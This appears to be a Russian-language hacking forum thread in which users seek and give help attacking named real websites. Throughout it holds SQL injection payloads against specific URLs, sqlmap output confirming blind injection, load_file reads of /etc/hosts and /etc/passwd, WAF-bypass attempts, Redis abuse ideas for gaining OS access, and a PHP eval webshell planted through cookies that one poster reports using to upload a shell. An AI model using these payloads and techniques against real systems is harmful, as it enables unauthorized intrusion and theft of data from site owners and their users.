Помогите с выводом вроде все хорошо Code: http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,table_name+from+information_schema.tables+limit+0,1-- но как хочу достать инфу, ничего не выводить Code: http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,AddressInfoID+from+helpusr.addressinfo--
Code: http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,count(AddressInfoID)+from+addressinfo--+ count = 0. Code: http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,count(username)+from+users+limit+0,1-- count = 0
Spoiler: Сайт Сайт: https://www.badjobs.ru/savereview/ POST: Code: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=1 Параметр: city_jobs sqlmap: Code: --- Parameter: city_jobs (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=(SELECT (CASE WHEN (8743=8743) THEN 8743 ELSE 8743*(SELECT 8743 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iqmj) --- [06:49:55] [INFO] testing MySQL [06:49:55] [INFO] confirming MySQL [06:49:55] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.28 back-end DBMS: MySQL >= 5.0.0
Ребята, есть сайт, в сторонних бд которого (не в текущей базе) лежат джумлы. Как нибудь можно узнать какому сайту принадлежит база джумлы? Например в ВП это делается 1 запросом..
таблицы там такой нет. максимум это поиск по контенту или титлу. https://rdot.org/forum/showthread.php?t=1990
какие есть варианты поиска абсолютного пути если имеется рутовый доступ в мускуле? файл конфига апача не помог тк там Include /etc/apache2/sites-enabled/ а что тут хз ,пробовал site_ru.conf, site.ru.conf, site.ru,siteru.conf не нашел перелопатил все базы в поиске пути ничего не нашел гугл тоже не помог Debian GNU/Linux 6.0 \n \l
https://rdot.org/forum/showthread.php?t=82 заодно соседей посмотрите на сайте через реверс, возможно через них получится
Помогите раскрутить. Spoiler http://myevent.com/1/helpcenter.htm уязвимое поле - поиск в итоге поулчаем запрос http://myevent.com/submit.php POST searchString=dfghdfhdfhdfh' or+1='1&componentID=search_help&submitted=1 - TRUE searchString=dfghdfhdfhdfh' or+1='2&componentID=search_help&submitted=1 - FALSE
с sqli в поиске чаще всего встречается уязвимость в LIKE (%inj%), поэтому нужно закрыть скобку и крутить как обычно: Code: ') union select 1,2,version(),4-- f 5.5.38-0ubuntu0.12.04.1-log
что тут можно сделать? Вывода я так понимаю не добиться, ну хотя бы на blind раскрутить. Spoiler https://secure.androticsdirect.com/register.php? POST xid=8f75e2274108df112c5f2ad2d230f9bb&title=Mr.&firstname=rwesdf&lastname=wedsa&company=&b_address=ewsfd&b_address_2=&b_city=wesdf&b_state=CA&b_country=US&b_zipcode=52323&s_address=&s_address_2='&s_city=&s_state=CA&s_country=US&s_zipcode=&phone=352523523&email=asfasf'+union+select+1+--+&fax=&url=&additional_values%5B1%5D=Yes&uname=long33&passwd1=123123&passwd2=123123&anonymous=&usertype=C
Помогите найти папку, в которой сайт лежит. Перебрал стандартные httpd conf пути-не подходит. http://sovita.ru/index.php?bpath=/m...t+1,2,3,4,5,6,7,load_file('/etc/hosts'),9+--+
http://tele-club.ru/buyticket?event_id=-1+union+select+1,2,3,load_file("/etc/hosts"),5,6,7,8,9,10+--+; А тут можно директорию определить? /etc/passwd говорит о том что сайт может лежать в /var/www/m.tele-club.ru/data/robots.txt Но конкретно эту не хочет читать...
{ШЕЛЛЫ тоже запрещено выкладывать, логины и пароли тоже} ps нахтак Опять же, по базам лазить нужно, там пути искать, а не только пытаться инклудить конфиги Пароли от форума или админки поискать, и сразу уже залиться. /var/www/tele-club.ru/www/forum/ вот такой путь получился
Добрый день. Есть сервер под управлением Ubuntu 12.04, на нем стоит mongodb 2.4.14 на которой настроена авторизация, но есть доступ. А так же redis 2.4.13, доступ тоже есть. В redis хранятся сессии от node.js (express.js). Возможно ли каким-либо образом получить доступ к ОС ? Или прочитать файл .js (местоположение на сервере известно) или получить доступ к админке (путь известен и логин админа тоже). По redis, нашел описание уязвимости по модификации местоположения файла dump.rdb (http://www.agarri.fr/kom/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html), но эксплуатация не удается, файл создается но содержимое его видимо в бинарном виде.
Spoiler: link http://www.inkaddict.com/search.php Можно как нибудь это заиспользовать? И что тут можно сделать? http://visotsky.org/ru/search?q=(dsfsdf
куча waf всяких. Можно как нибудь обойти на нормальный вывод? http://scdistribution.com/resources.html?q_release=-2015-05-12'+or+substring(@@version,1,1)=5+--+ и все равно ругается на многие комбинации.
При постановке данных в куки и Юзер агент работает phpinfo(), но не осмысленный код, который позволяет залиться. Пробовал в куки ставить <?php eval("$_POST[c]");?> Опять же сложный код не работает Что сделать можно? $_POST[c]=/*$s='/home/virtualki/18281'*/;echo '111';echo 222; = работает $_POST[c]=$s='/home/virtualki/18281';echo '111';echo 222; =не работает echo('111');echo 222; -работает Залился, помог base64
